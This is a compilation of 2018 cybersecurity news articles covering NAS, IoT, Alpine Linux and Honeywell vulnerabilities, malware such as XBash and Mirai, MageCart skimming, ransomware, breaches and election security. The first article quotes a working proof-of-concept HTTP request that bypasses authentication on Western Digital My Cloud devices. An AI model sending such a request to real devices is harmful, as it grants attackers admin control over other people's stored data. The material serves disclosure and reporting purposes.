An authentication bypass vulnerability in Western Digital My Cloud NAS could allow hackers to access the content of the storage
Researchers at security firm Securify have discovered an elevation of privilege vulnerability in the Western Digital My Cloud platform that could be exploited by attackers to gain admin-level access to the device via an HTTP request.

The flaw, tracked as CVE-2018-17153, would allow an unauthenticated attacker with network access to the device to authenticate as an admin without providing a password.

The attacker could exploit the flaw to run commands, access the stored data, modify/copy them as well as wipe the NAS.

“It was discovered that the Western Digital My Cloud is affected by an authentication bypass vulnerability that allows an unauthenticated user to create an admin session that is tied to her IP address.” reads the report published by Securify.

“By exploiting this issue an unauthenticated attacker can run commands that would normally require admin privileges and gain complete control of the My Cloud device.”

The vulnerability resides in the process of creation of admin sessions implemented by the My Cloud devices that bound to the user’s IP address.

Once the session is created, it is possible to call the authenticated CGI modules by sending the cookie username=admin in the HTTP request. The CGI will check if a valid session is present and bound to the user’s IP address.

An attacker can send a CGI call to the device including a cookie containing the cookie username=admin.

“It was found that it is possible for an unauthenticated attacker to create a valid session without requiring to authenticate.” continues Securify.

“The network_mgr.cgi CGI module contains a command called cgi_get_ipv6 that starts an admin session that is tied to the IP address of the user making the request when invoked with the parameter flag equal to 1. Subsequent invocation of commands that would normally require admin privileges are now authorized if an attacker sets the username=admin cookie.”

Western Digital My Cloud flaw

The experts published the following PoC code to exploit the issue:

POST /cgi-bin/network_mgr.cgi HTTP/1.1
Host: wdmycloud.local
Content-Type: application/x-www-form-urlencoded
Cookie: username=admin
Content-Length: 23

cmd=cgi_get_ipv6&flag=1
Securify reported the vulnerability to Western Digital in April, but it is still waiting for a response.

In February, experts from Trustwave disclosed two vulnerabilities in Western Digital My Cloud network storage devices that could be exploited by a local attacker to gain root access to the NAS devices.

In April, security experts at Trustwave discovered that Western Digital My Cloud EX2 storage devices were leaking files on a local network by default.


Evolution of threat landscape for IoT devices – H1 2018
19.9.2018 securityaffairs
IoT

Security experts from Kaspersky have published an interesting report on the new trends in the IoT threat landscape. What is infecting IoT devices and how?
The researchers set up a honeypot to collect data on infected IoT devices, the way threat actors infect IoT devices and what families of malware are involved.

The first data that emerged from the study is that threat actors continue to look at the IoT devices with increasing interest. In the first six months of 2018, the experts observed a number of malware samples that was up three times as many samples targeting IoT devices as in the whole of 2017. In 2017 there were ten times more than in 2016.

IoT devices attacks

In the first half of 2018, researchers at Kaspersky Lab said that the most popular attack vector against IoT devices remains cracking Telnet passwords (75,40%), followed by cracking SSH passwords (11,59%).

Mirai dominates the IoT threat landscape, 20.9% of IoT devices were infected by this malicious code, other prominent malware are Hajime (5.89%) and Gafgyt.

Top 10 countries from which Kaspersky traps were hit by Telnet password attacks is led by Brazil, China, and Japan.

“As we see, in Q2 2018 the leader by number of unique IP addresses from which Telnet password attacks originated was Brazil (23%). Second place went to China (17%). Russia in our list took 4th place (7%).” reads the report.

“Overall for the period January 1 – July 2018, our Telnet honeypot registered more than 12 million attacks from 86,560 unique IP addresses, and malware was downloaded from 27,693 unique IP addresses.”

Experts pointed out that infected MikroTik routers made up 37.23 percent of all the data collected, followed by TP-Link that accounted for 9.07%.

MikroTik devices running under RouterOS are targeted by malicious code that includes the exploit for the Chimay-Red vulnerability.

The Chimay Red hacking tool leverages 2 exploits, the Winbox Any Directory File Read (CVE-2018-14847) and Webfig Remote Code Execution Vulnerability.

MikroTik devices were involved in several campaigns in the past months, including the VPNfilter botnet that infected almost a million routers in more than 50 countries

Iot devices

Experts highlighted that IoT malware is increasing both in quantity and quality.

“More and more exploits are being weaponized by cybercriminals, and infected devices are used to steal personal data and mine cryptocurrencies, on top of traditional DDoS attacks.” concludes Kaspersky.

Let me suggest to read to read the report, is full of interesting data.


Mirai authors avoid the jail by helping US authorities in other investigations
19.9.2018 securityaffairs
BotNet

Three men who admitted to being the authors of the Mirai botnet avoided the jail after helping the FBI in other cybercrime investigations.
I’m following the evolution of Mirai botnet since MalwareMustDie shared with me the findings of its investigation in August 2016.

Now three individuals who admitted to being the authors of the infamous botnet avoided the jail after helping feds in another cybercrime investigations.

The three men, Josiah White (21) of Washington, Pennsylvania; Paras Jha (22), of Fanwood, New Jersey, and Dalton Norman (22), of Metairie, Louisiana, pleaded guilty in December 2017 to developing and running the dreaded Mirai botnet that was involved in several massive DDoS attacks.

The identification and conviction of the three men is the result of an international joint cooperation between government agencies in the US, UK, Northern Ireland, and France, and private firms, including Palo Alto Networks, Google, Cloudflare, Coinbase, Flashpoint, Oath, Qihoo 360 and Akamai.

According to the plea agreements, White developed the Telnet scanner component used by Mirai, Jha created the botnet’s core infrastructure and the malware’s remote control features, while Norman developed new exploits.

Jha, who goes online with the moniker “Anna-senpai” leaked the source code for the Mirai malware on a criminal forum, allowing other threat actors to use it and making hard the attribution of the attacks.

Jha also pleaded guilty to carrying out multiple DDoS attacks against his alma mater Rutgers University between November 2014 and September 2016, before creating the Mirai botnet. According to the authorities, the three earned roughly $180,000 through their click fraud scheme.

The Mirai case was investigated by the FBI Field Office in Anchorage, and the Chief U.S. District Judge in Alaska sentenced the men.

“U.S. Attorney Bryan Schroder announced today that three defendants have been sentenced for their roles in creating and operating two botnets, which targeted “Internet of Things” (IoT) devices. Paras Jha, 22, of Fanwood, New Jersey; Josiah White, 21, of Washington, Pennsylvania; and Dalton Norman, 22, of Metairie, Louisiana, were sentenced today by Chief U.S. District Judge Timothy M. Burgess.” states the press release published by the DoJ.

“On Dec. 8, 2017, Jha, White, and Norman pleaded guilty to criminal Informations in the District of Alaska charging them each with conspiracy to violate the Computer Fraud & Abuse Act in operating the Mirai Botnet. Jha and Norman also pleaded guilty to two counts each of the same charge, one in relation to the Mirai botnet and the other in relation to the Clickfraud botnet.”

On Tuesday, the DoJ revealed on Tuesday that each of the men was sentenced to five years of probation and 2,500 hours of community service.

The judges required them to repay $127,000, and they have voluntarily handed over huge amounts of cryptocurrency that the authorities seized as part of the investigation on the botnet.

mirai

The three men have “cooperated extensively” with the authorities helping the FBI on complex cybercrime investigations before the sentence. The trio will continue to offer their support to the feds.

“After cooperating extensively with the FBI, Jha, White, and Norman were each sentenced to serve a five-year period of probation, 2,500 hours of community service, ordered to pay restitution in the amount of $127,000, and have voluntarily abandoned significant amounts of cryptocurrency seized during the course of the investigation.” continues the press release.

” As part of their sentences, Jha, White, and Norman must continue to cooperate with the FBI on cybercrime and cybersecurity matters, as well as continued cooperation with and assistance to law enforcement and the broader research community.”


Facebook Offers Rewards for Access Token Exposure Flaws
18.9.2018 securityweek
Social

Facebook announced on Monday that it has expanded its bug bounty program to introduce rewards for reports describing vulnerabilities that involve the exposure of user access tokens.

Access tokens allow users to log into third-party applications and websites through Facebook. The tokens are unique for each user and each app, and users can choose what information can be accessed by the token and the app using it, as well as what actions it can take. The problem is that if a token is exposed, it can be misused to an extent that depends on the permissions set by its owner.

Facebook has updated its bug bounty program to clarify what it expects from reports describing token-related vulnerabilities.

In order to qualify for a bug bounty – Facebook is offering a minimum of $500 per vulnerability – researchers have to submit a clear proof-of-concept (PoC) demonstrating a flaw that allows access to or misuse of tokens.

One very important condition, according to the company, is that the bug needs to be discovered by passively viewing data sent to or from a device while the affected application is in use.

“You are not permitted to manipulate any request sent to the app or website from your device, or otherwise interfere with the ordinary functioning of the app or website in connection with submitting your report. For example, SQLi, XSS, open redirect, or permission-bypass vulnerabilities (such as IDOR) are strictly out of scope,” explained Dan Gurfinkel, Security Engineering Manager at Facebook.

The social media giant will inform the developer of the impacted app or website and work with them to address the issue. Apps that fail to promptly comply will be suspended from the platform until the problem has been resolved and a security review is conducted. Facebook says it will also automatically revoke tokens that may have been compromised.

Facebook has taken significant steps to improve security and privacy following the Cambridge Analytica scandal, in which the personal details of a significant number of users were harvested. The company announced in March that it had made a series of changes to its developer platform to implement tighter user privacy controls and limit how apps can access user data. It later announced rewards for users who report misuse of private information.

According to Facebook, in 2017 it paid out $880,000 in bug bounties, with a total of over $6.3 million since the launch of its program in 2011.


Cracked Windows installations are serially infected with EternalBlue exploit code
18.9.2018 securityaffairs
Virus

According to Avira, hundreds of thousands of unpatched Windows systems are serially infected with EternalBlue exploit code.
The EternalBlue, is the alleged NSA exploit that made the headlines with DOUBLEPULSAR in the WannaCry attack.

The malicious code was leaked online by the Shadow Brokers hacking group that stole it from the arsenal of the NSA-linked Equation Group.

ETERNALBLUE targets the Server Message Block SMBv1 protocol on port 445, it has become widely adopted in the community of malware developers to target Windows 7 and Windows XP systems.

Microsoft addressed the flaw with the MS17-010 and also released an emergency patch for Windows XP and Server 2003 in response to the WannaCry ransomware attacks.

EternalBlue

According to a new blog post published by Avira, unpatched systems remain exposed to cyber attacks and are serially infected by threat actors.

“There are still significant numbers of repeatedly infected machines more than a year after the big WannaCry and Petya attacks,” said Mikel Echevarria-Lizarraga, senior virus analyst in the Avira Protection Lab.

“Our research has linked this to Windows machines that haven’t been updated against the NSA Eternal Blue exploit and are an open target for malware.”

The number of unpatched systems exposed online is very high, experts pointed out that most of them have been infected multiple times, they were found to run cracked Windows installations this means that they did not receive Microsoft’s security updates.

“We were researching the reasons behind a number of machines having repeated infections,” added Mikel. “We’ve found that many of these serially infected machines were running activation cracks which means that they cannot or do not want to update Windows and install updates. It also means that they did not receive the March 2018 emergency patch from Microsoft for this vulnerability.”

Avira decided to turn off the SMB1 protocol entirely on the infected machine to stop the endless infection loop.

The experts discovered around 300,000 computers affected by the issue and the Avira Protection whatever is deactivating the SMB1 protocol on around 14,000 computers daily.

The list of the top ten countries for serially infected machines is:

Indonesia
Taiwan
Vietnam
Thailand
Egypt
Russia
China
Philippines
India
Turkey
The above list doesn’t surprise the experts, according to studies from Statista, the above countries are top nations for the use of unlicensed software.

“The predominance of infected machines outside of North America and Europe roughly parallels studies from Statista on the use of unlicensed software.” concluded AVIRA.

“This study found unlicensed software rates averaging around 52 – 60% outside the United States and the European Union and fell to 16% and 28% respectively in these areas. Unlicensed software is usually unable to get the latest patches against vulnerabilities such as EternalBlue.”


Amazon is investigating allegations that its staff is selling customer data

18.9.2018 securityaffairs Privacy

Amazon confirmed an ongoing investigation of the allegations that some of its personnel sold confidential customer data to third party companies.
Amazon confirmed that it is investigating allegations that its staff sold customer data and other confidential information to third-party firms, particularly in China, a practice that violated the company policy.

The news was first reported by the Wall Street Journal, which discovered that the company staff sells customers data to merchants that are Amazon sellers.

“Employees of Amazon, primarily with the aid of intermediaries, are offering internal data and other confidential information that can give an edge to independent merchants selling their products on the site, according to sellers who have been offered and purchased the data, as well as brokers who provide it and people familiar with internal investigations.” reads the report published by the WSJ.

On Amazon, customers can buy products sold directly by the company along with goods from many other merchants.

The Wall Street Journal said cited the cases of intermediaries in Shenzhen working for group employees and selling information on sales volumes for payments ranging from 80 to more than 2,000 dollars.

“[Amazon is] conducting a thorough investigation of these claims.” Amazon spokesperson told AFP.

“We have zero tolerance for abuse of our systems and if we find bad actors who have engaged in this behavior, we will take swift action against them, including terminating their selling accounts, deleting reviews, withholding funds, and taking legal action,” the statement said.

The company is concerned by fake reviews by purported customers, the company started the investigation months ago.


Altaba Settles Yahoo Breach Lawsuits for $47 Million
18.9.2018 securityaffairs
IT

Altaba, the investment company that resulted from Verizon’s $4.5 billion acquisition of Yahoo’s Internet business last year, has agreed to settle consumer class action lawsuits triggered by the massive data breaches suffered by Yahoo in the past years.

Yahoo revealed in September 2016 that its systems had been breached in late 2014 by what it believed to be a state-sponsored threat actor that had managed to access data from at least 500 million accounts.

In December 2016, the company announced a different breach, one that dated back to 2013, which impacted one billion user accounts. In October 2017, Yahoo admitted that the 2013 hack actually impacted all of its 3 billion users.Altaba Settles Consumer Class Action Lawsuits Related to Yahoo Breach for $47 Million

Several class action lawsuits were filed and the US Securities and Exchange Commission (SEC) launched an investigation into how the breaches were disclosed.

In a letter to shareholders, published on Monday on the SEC’s website, Altaba CEO Thomas J. McInerney revealed that the company expects to incur $47 million in settlement expenses related to three breach-related lawsuits.

“We are also pleased to announce today that we have reached an agreement in principle (subject to court approval) to settle the consumer class action litigation related to the Yahoo data breach. We have also received final court approval of the securities class action settlement, and we have negotiated an agreement to settle the shareholder derivative litigation (subject to court approval). We estimate that the Company will incur an incremental net $47 million in litigation settlement expenses to resolve all three cases,” McInerney wrote. “Together, these developments mark a significant milestone in cleaning up our contingent liabilities related to the Yahoo data breach.”

The latest breach-related settlement comes after Altaba in April agreed to pay a $35 million penalty to the SEC for not disclosing the 2014 breach to investors. In addition, a judge recently approved an $80 million settlement that Altaba agreed to pay after being accused of misleading investors about a total of four data breaches.

Commenting on the latest settlement, Ilia Kolochenko, CEO of web security company High-Tech Bridge, said, “Class actions are known to provide their members with very modest compensation compared to individual lawsuits. The settlement (subject to approval by court) makes slightly above $10 per breached account – a scanty amount in the GDPR era. Should a similar data breach happen today with the same disclosure timeline and similar circumstances, the amount of settlement could be significantly higher. Therefore, I think this is a considerable legal victory for Yahoo’s legal team.”


EternalBlue-Vulnerable Systems Serially Infected

18.9.2018 securityweek Virus

Windows machines that haven’t been patched against the National Security Agency-linked EternalBlue exploit are stuck in an endless loop of infection, Avira warns.

The EternalBlue exploit, which the Shadow Brokers hacking group stole from the NSA-linked Equation Group, is best known for its role in the WannaCry outbreak last year.

The ransomware hit mostly Windows 7 and Windows XP machines, and for good reason. Its spread mechanism was targeting a vulnerability in Windows’ Server Message Block (SMB) on port 445, which mainly impacted those platform iterations.

The exploit was made public a month after Microsoft released a patch for the vulnerability it targets, but hundreds of thousands of systems continue to be vulnerable today, Avira says. An emergency patch was also released for Windows XP.

The unpatched systems remain exposed to any malware that abuses the EternalBlue exploit and, as Avira senior virus analyst Mikel Echevarria-Lizarraga points out, many of these systems are serially infected.

“There are still significant numbers of repeatedly infected machines more than a year after WannaCry. […] Our research has linked this to Windows machines that haven’t been updated against the NSA Eternal Blue exploit and are an open target for malware,” he says.

The number of unpatched systems, he reveals, is very high, but there’s an explanation for that. Many of the systems that have been infected multiple times were found to run activation cracks. This means that they did not receive Microsoft’s patches.

Without the official patch, users should turn off the older SMB1 protocol entirely on these machines to stay protected, the security researcher says.

Avira says they decided to take this security measure on the machines they found to be missing the patch and that this led to the discovery of around 300,000 computers affected by the issue.

Avira says they are deactivating the vulnerable protocol on around 14,000 systems each day and that the protective measure appears to be paying off.

“The strategy is working. Once the SMB1 protocol is deactivated, we don’t see the same machines affected again and again with this problem,” he says.

The top 10 impacted countries, Avira reveals, are Indonesia, Taiwan, Vietnam, Thailand, Egypt, Russia, China, Philippines, India, and Turkey. The numbers are in line with the findings of studies from Statista on the use of unlicensed software, Avira’s Lyle Frink says.

According to these studies, the unlicensed software rates are of around 52 – 60% outside the United States and the European Union. In these areas, the rates are of only 16% and 28%, respectively.

“Unlicensed software is usually unable to get the latest patches against vulnerabilities such as EternalBlue,” Frink underlines.


Code Execution in Alpine Linux Impacts Containers
18.9.2018 securityweek
Vulnerebility

A security researcher discovered several vulnerabilities in Alpine Linux, a distribution commonly used with Docker, including one that could allow for arbitrary code execution.

Based on musl and BusyBox, the Alpine Linux distribution has a small size and is heavily used in containers, including Docker, as it provides fast boot times.

APK, the default package manager in Alpine, is impacted by several bugs, security researcher Max Justicz has discovered. The most important of them, the researcher says, could allow a network man-in-the-middle (or a malicious package mirror) to execute arbitrary code on the user’s machine.

“This is especially bad because packages aren’t served over TLS when using the default repositories,” Justicz notes.

An attacker could target a Docker container based on Alpine for code execution, the security researcher reveals. Justicz also published a video detailing such an attack.

The issue, the researcher explains, is that the package manager extracts packages (which are gzipped tar files distributed as apks) before checking their hashes. If the downloaded package’s hash doesn’t match, the APK then attempts to unlink all extracted files and directories.

The APK’s commit hooks feature allows an attacker to turn persistent arbitrary file writes into code execution, as long as the files survive the cleanup process. Thus, the files are executed before apk exits.

For that, the attacker needs to be in control of the downloaded tar file and ensure that the APK won’t be able to unlink the payload and its directory during the cleanup process.

The next step is to make the APK process exit successfully, which requires the return of exit code 0. Normally, it “will return an exit code equal to the number of packages it has failed to install, which is now at least one,” the researcher explains.

However, the value can overflow and, if the number of errors % 256 == 0, the process returns exit code 0, meaning the attack was successful. The researcher was also able to write shellcode to exit(0) directly into memory and have it executed.

The bug likely impacts all those who use Alpine Linux in a production environment. All Alpine-derived container images should be rebuilt to eliminate the issue, the researcher points out.

Alpine Linux, the researcher says, is used by probably hundreds of organizations, all of which could have been affected by this bug.

“Some of those organizations almost certainly have bug bounty programs that would pay generously if a similar bug had been written by one of their own developers. If the goal of a bug bounty program is to help secure an organization, shouldn’t critical bugs in dependencies qualify to some extent?” Justicz concludes.


New XBash malware combines features from ransomware, cryptocurrency miners, botnets, and worms
18.9.2018 securityaffairs
Ransomware  Virus

Palo Alto Network researchers discovered a new malware, tracked as XBash, that combines features from ransomware, cryptocurrency miners, botnets, and worms
Security researchers at Palo Alto Networks have discovered a new piece of malware, dubbed XBash piece that is targeting both Linux and Microsoft Windows servers.

Xbash was developed using Python, then the authors converted into self-contained Linux ELF executables by abusing the legitimate tool PyInstaller for distribution.

The malicious code combines features from different families of malware such as ransomware, cryptocurrency miners, botnets, and worms.

“Xbash has ransomware and coinmining capabilities. It also has self-propagating capabilities (meaning it has worm-like characteristics similar to WannaCry or Petya/NotPetya).” reads the analysis published by Palo Alto Networks.

“It also has capabilities not currently implemented that, when implemented, could enable it to spread very quickly within an organizations’ network (again, much like WannaCry or Petya/NotPetya).”

The malicious code was attributed to a popular crime gang tracked as the Iron Group.

The Iron cybercrime group has been active since at least 2016, is known for the Iron ransomware but across the years it is built various strain of malware, including backdoors, cryptocurrency miners, and ransomware to target both mobile and desktop systems.

“In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code.” states the report published by Intezer.

“We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.”

Thousands of victims have been infected by malware used by the crime gang.

Now the experts from Palo Alto Networks discovered the new XBash malware strain that combines botnet, coinmining, ransomware, and self-propagation. The botnet and ransomware features are observed in infections of Linux systems, while a coinminer behavior was seen in infections of the Windows servers.

The Xbash authors have implemented scanning capabilities used by the malware to search for vulnerable servers online. The malicious code search for unpatched web applications that are vulnerable to a series of known exploits or to brute force attack with a dictionary of default credentials.

“When Xbash finds a destination has Hadoop, Redis or ActiveMQ running, it will also attempt to exploit the service for self-propagation.” continues the report.

“Three known vulnerabilities are targeted:

Hadoop YARN ResourceManager unauthenticated command execution, which was first disclosed in October 2016 and has no CVE number assigned.
Redis arbitrary file write and remote command execution, which was first disclosed in October 2015 and has no CVE number assigned. This is shown below in Figure 6.
ActiveMQ arbitrary file write vulnerability, CVE-2016-3088.”

The malware can infect Windows systems, only after the compromise of a vulnerable Redis server.

The scanner component also scans the Internet for servers that run services that have been left online exposed without a password or are using weak credentials. The scanners target web servers (HTTP), VNC, MariaDB, MySQL, PostgreSQL, Redis, MongoDB, Oracle DB, CouchDB, ElasticSearch, Memcached, FTP, Telnet, RDP, UPnP/SSDP, NTP, DNS, SNMP, LDAP, Rexec, Rlogin, Rsh, and Rsync.

Hackers attempt to monetize their efforts through coin-mining activities on Windows systems or with ransomware based attacks on Linux servers running database services.

The XBash component will scan and delete MySQL, MongoDB, and PostgreSQL databases and drops a ransom asking for the payment of 0.02 Bitcoin ($125) to recover them.

Xbash Xbash

Unfortunately, victims will never recover their data because the malware wipe data and not back it up.

“we have observed three different bitcoin wallet addresses hard-coded in the Xbash samples. Since May 2018, there are 48 incoming transactions to these wallets with total income of about 0.964 bitcoins (about US$6,000 at the time of this writing).” continues the analysis.

“the funds are being withdrawn, showing us that the attackers are actively collecting their ransom.”

Experts noticed in all versions of Xbash the presence of a Python class named “LanScan” used to target enterprise networks. The class allows to get local intranet information, generate a list of all IP addresses within the same subnet, and to perform port scanning to all these IPs

The code is still not active in the malware, likely crooks are working on its development.

Experts believe XBash will continue to evolve, for example including the miner component for Linux servers as well.

Further info, including IoCs, are reported in the analysis published by the experts.


Ransomware Disrupts Flight Boards at U.K. Airport
18.9.2018 securityweek
Ransomware

Bristol Airport in the United Kingdom was hit recently by a ransomware incident that caused disruption to flight information display systems, forcing staff to resort to whiteboards and markers.

Bristol Airport, which according to Wikipedia is the ninth busiest airport in the UK by passenger traffic, informed travellers on Friday that it had been experiencing “technical problems” with its flight information screens.

No flights were impacted, but the airport had to use alternative ways to help customers keep track of flights, including announcements made over the public address system and using markers to write down flight information on whiteboards and pieces of paper.

Bristol Airport hit by ransomware

The flight information screens were restored in key locations in the terminal by Sunday morning local time.

Bristol Airport representatives said they did not believe it was a targeted attack. They noted that the flight information screens and other applications were taken offline as a precaution after the malware made its way onto some administrative systems.

The airport said it did not pay any ransom, and claimed that it took longer to bring systems back online due to its “cautious approach.” Representatives said the incident did not impact or put at risk any safety or security systems.

Ransomware causing disruptions at an airport is not unheard of. Last year, airports in Ukraine were hit in both the Bad Rabbit and NotPetya attacks, although NotPetya later turned out to be a wiper malware disguised as a piece of ransomware.


MageCart Attackers Compromise Cloud Service Firm Feedify
18.9.2018 securityweek Hacking

Hundreds of e-commerce Sites Impacted by MageCart Compromise of Cloud Service Provider

Payment card data from customers of hundreds of e-commerce websites may have been stolen after the MageCart threat actors managed to compromise customer engagement service Feedify.

Feedify, which claims to have over 4,000 customers, provides customers with various tools to target users based on their behavior, along with real-time analytics, reports, and push notifications.

The infection was possible because Feedify requires customers to add a JavaScript script to their websites to use the service. The script loads various resources from Feedify’s servers, including a compromised library named “feedbackembad-min-1.0.js,” which is used by hundreds of sites.

This means that all of the users who, when loading the website of a Feedify customer, also loaded the compromised feedback library, might have had their personal information stolen by the malicious MageCart code.

Tracked since 2015, MageCart has been targeting e-commerce sites with web-based card skimmers – malicious code that steals payment card and other sensitive information provided by the users. The actors have hit a large number of businesses, including Ticketmaster and British Airways.

Now, researchers have discovered that the actors managed to compromise Feedify and that they injected their malicious code into a library the Feedify script served to customers’ websites. Thus, all those who visited the impacted sites would load the malicious code in their browsers.

On Wednesday, RiskIQ researcher Yonathan Klijnsma confirmed not only that Feedify was compromised, but also that the attackers might have had access to the service’s servers for nearly a month.

Yonathan Klijnsma

@ydklijnsma
They've been affected by Magecart since Friday, August 17 2018 @ 16:51:01 GMT as we recorded it.

Placebo
@Placebo52510486
Magecart on Feedify. A customer engagement tool. According to there website 4000+ website use there tooling/code. Fixed today after I notified them.@ydklijnsma @GossiTheDog

View image on TwitterView image on TwitterView image on Twitter
10:05 PM - Sep 11, 2018
15
See Yonathan Klijnsma's other Tweets
Twitter Ads info and privacy

Feedify apparently removed the malicious code after a security researcher alerted them on Tuesday, but it didn’t take long for the attackers to re-infect the script, revealing that the actors still had access to the company’s servers.

As previous reporting on MageCart underlined, the attackers appear to have broad access into the compromised infrastructure and are not shy to re-inject their malicious code if it gets removed. In one instance, they even threatened the victim, claiming they would encrypt all of their resources if the malicious code is removed again.

At the end of August, security researcher Willem de Groot revealed that the attackers might have planted their credit card data-scrapping code onto over 7000 websites. The skimmers appeared to react fast to blocking attempts and were compromising tens of new sites per day, he said.

SecurityWeek contacted Feedify for a statement on the incident but a company’s spokesperson wasn’t immediately available for comment.


Google's Android Team Finds Serious Flaw in Honeywell Devices
18.9.2018 securityweek
Android

Members of Google’s Android team discovered that some of Honeywell’s Android-based handheld computers are affected by a high severity privilege escalation vulnerability. The vendor has released software updates that should address the flaw.

Honeywell’s handheld computers are advertised as devices that combine the advantages provided by consumer PDAs with high-end industrial mobile computers. These rugged devices run Android or Windows operating systems and they provide a wide range of useful functions and connectivity features, including Wi-Fi, Bluetooth and compatibility with Cisco products. The devices are used worldwide in the commercial facilities, critical manufacturing, energy and healthcare sectors.Honeywell handheld computers affected by vulnerability

According to ICS-CERT, the vulnerability found by Google employees affects 17 handheld computers from Honeywell, including CT60, CN80, CT40, CK75, CN75, CT50, D75e, CN51, and EDA series devices running various versions of Android, from 4.4 through 8.1.

If a malicious application makes its way onto an affected device, it can allow its creators to elevate privileges on the system and gain unauthorized access to sensitive information, including keystrokes, passwords, photos, emails, and business-critical documents.

“A skilled attacker with advanced knowledge of the target system could exploit this vulnerability by creating an application that would successfully bind to the service and gain elevated system privileges,” ICS-CERT said in its advisory.

Honeywell handheld computers affected by vulnerability

The flaw is tracked as CVE-2018-14825 and it has been assigned a CVSS score of 7.6, which makes it “high severity.” The national CERTs of several countries have published advisories to warn organizations about the vulnerability.

While the security hole has been found by Google’s Android team, Honeywell told SecurityWeek that the issue is specific to its products and it does not impact Android in general.

“Honeywell has identified a potential vulnerability on select versions of our rugged mobile computers and issued a software patch to update these devices.” Eric Krantz, a Honeywell spokesperson, said via email.

ICS-CERT provides a complete list of impacted devices and Android versions, along with the software releases containing a patch. In addition to applying the fixes, Honeywell has advised customers to whitelist trusted applications in an effort to limit the risk of malicious apps getting on devices.


New Bill Aims to Address Cybersecurity Workforce Shortage
18.9.2018 securityweek
Cyber

A bill introduced last week by U.S. Rep. Jacky Rosen (D-Nev.) aims to address the cybersecurity workforce shortage through a grant for apprenticeship programs.

The new bill, called the Cyber Ready Workforce Act, is inspired by Nevada’s recently introduced cybersecurity apprenticeship program. This new piece of legislation would help establish a program within the Department of Labor for awarding grants, on a competitive basis, to workforce intermediaries.

The goal is to create, implement and expand cybersecurity apprenticeship programs. Apprentices will benefit from support services that include career counseling, mentorship, and assistance with housing, transportation and child care costs.

Programs eligible for grants can include ones providing technical instruction, workplace training, and certifications for support specialists, support technicians, programmers, cybersecurity specialists, and system analysts.

“The demand for talent in cybersecurity is sky-high, and we’re putting ourselves at risk if we don’t address this shortage in our workforce,” said Congresswoman Rosen. “I’m committed to ensuring that businesses and government have the skilled people and critical tools they need to enhance our nation’s cybersecurity infrastructure, help industry thrive, and strengthen our national security. Everything we do in today’s economy is shaped by technology, and I will continue to work with my House colleagues to ensure our families and communities are better protected against cyber threats.”

The initiative is backed by several lawmakers in Massachusetts and New York, and organizations such as the CompTIA tech association and The Learning Center.

“Investing in and expanding our cybersecurity workforce doesn’t only fuel our economy, it keeps us safe,” said Congressman Seth Moulton. “While I was fighting on the ground in Iraq, Al-Qaeda was fighting us on the internet — and they were beating us online! And while we focused on Russia’s military in 2016, they attacked us through the internet. This bill is an important first step towards making sure we don’t get ourselves into such a vulnerable position again.”

The bill introduced by Rep. Rosen, who is a member of the House Armed Services Committee and the Congressional Cybersecurity Caucus, cites NIST’s CyberSeek, which shows that there are more than 300,000 cybersecurity job openings at the moment.


Amazon Probing Staff Data Leaks
18.9.2018 securityweek
Incindent

Amazon is investigating allegations that some of its staff sold confidential customer data to third party companies particularly in China, the online giant confirmed on Sunday.

According to a Wall Street Journal report, which did not give figures, employees of the e-retailer sell internal data and other confidential information -- usually through intermediaries -- to merchants who sell their goods on the US giant's website.

On Amazon, customers can buy products sold directly by the company along with goods from many other merchants.

The practice under investigation is a violation of company policy. It is particularly present in China, the paper said, citing the example of intermediaries in Shenzhen working for group employees and selling information on sales volumes for payments ranging from 80 to more than 2,000 dollars.

An Amazon spokesperson told AFP in a brief statement that the company is "conducting a thorough investigation of these claims."

"We have zero tolerance for abuse of our systems and if we find bad actors who have engaged in this behavior, we will take swift action against them, including terminating their selling accounts, deleting reviews, withholding funds, and taking legal action," the statement said.

Fake reviews by purported customers are among the concerns of the internal probe, according to the WSJ, which said Amazon has been investigating this topic for months.

Amazon employs approximately 560,000 people worldwide.


Wisconsin Officials Prepare for Potential Election Hackers
18.9.2018 securityweek Hacking

A private vendor inadvertently introduces malware into voting machines he is servicing. A hacker hijacks the cellular modem used to transmit unofficial Election Day results. An email address is compromised, giving bad actors the same access to voting software as a local elections official.

These are some of the potential vulnerabilities of Wisconsin's election system described by cybersecurity experts.

State officials insist they are on top of the problem and that Wisconsin's elections infrastructure is secure because, among other safeguards, voting machines are not connected to the internet and each vote is backed by a paper ballot to verify results.

In July, the Wisconsin Center for Investigative Journalism reported that Russian hackers have targeted websites of the Democratic Party of Wisconsin, the state Department of Workforce Development and municipalities including Ashland, Bayfield and Washburn. Elections in this swing state are administered by 1,853 municipal clerks, 72 county clerks and the Wisconsin Elections Commission.

Top cybersecurity experts from the United States, Canada and Russia interviewed by the Center said that some practices and hardware components could make voting in Wisconsin open to a few types of malicious attacks, and that Russian actors have a record of these specific actions.

And it is not just Wisconsin — this is a nationwide threat, the National Academy of Sciences, Engineering and Medicine stated in its newly released report, Securing the Vote.

"With respect to foreign threats, the challenge is compounded by the great asymmetry between the capabilities and resources available to local jurisdictions in the United States and those of foreign intelligence services," according to the report.

Wisconsin Elections Commission spokesman Reid Magney said the agency has been doing "almost everything they recommend" in the report for several years except for a specific type of post-election audit, which will be discussed at a Sept. 25 meeting.

"In short, we're way ahead of the curve in election security and ought to get some credit for that," Magney said.

Private companies, which supply the hardware and software for voting, are increasingly the focus of federal lawmakers, security experts and election integrity advocates.

Former longtime Legislative Audit Bureau manager Karen McKim, a coordinator for the Madison-based grassroots group Wisconsin Election Integrity, said many Wisconsin elections officials do not realize "how very much is completely outside their control."

"They really, truly, do believe that if they keep the individual voting machines unconnected from the internet and do pre-election testing, that the software is safe," said McKim, whose group advocates for measures to secure Wisconsin's elections.

Voting machines are certified by the state. But there are no federal standards for security, operation or hiring processes at companies that provide hardware and software for voting. The state does not scrutinize the security practices of such private vendors.

"While (outsourcing pre-election programming) may introduce a vulnerability, the more important question is whether that vulnerability is acceptable," Magney said. "And that depends on the exact details of the security mitigations involved."

Dane County Clerk Scott McDonell said large counties in Wisconsin such as his "typically code their own elections," but "the small ones are outsourcing."

"If I were being paranoid," he added, "I would worry about the outsourced ones."

Cybersecurity expert Luke McNamara confirmed that private vendors can be a vulnerability. McNamara is a senior analyst at the California-based FireEye cybersecurity firm, which investigated the breach of Illinois' voter registration database that happened before the 2016 election.

